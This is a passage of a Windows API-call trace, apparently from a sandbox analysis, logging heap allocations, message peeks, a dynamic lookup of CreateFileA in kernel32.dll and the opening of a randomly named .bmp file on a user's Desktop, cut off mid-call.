hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.722] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.722] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.722] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.722] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.723] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.725] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.727] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cc40 [0030.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cc40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.728] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc40 [0030.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cc40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.728] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x936008 [0030.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp", cchWideChar=85, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 85 [0030.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x55) returned 0x794b90 [0030.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp", cchWideChar=85, lpMultiByteStr=0x794b90, cbMultiByte=85, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp", lpUsedDefaultChar=0x0) returned 85 [0030.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0030.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.729] CreateFileA 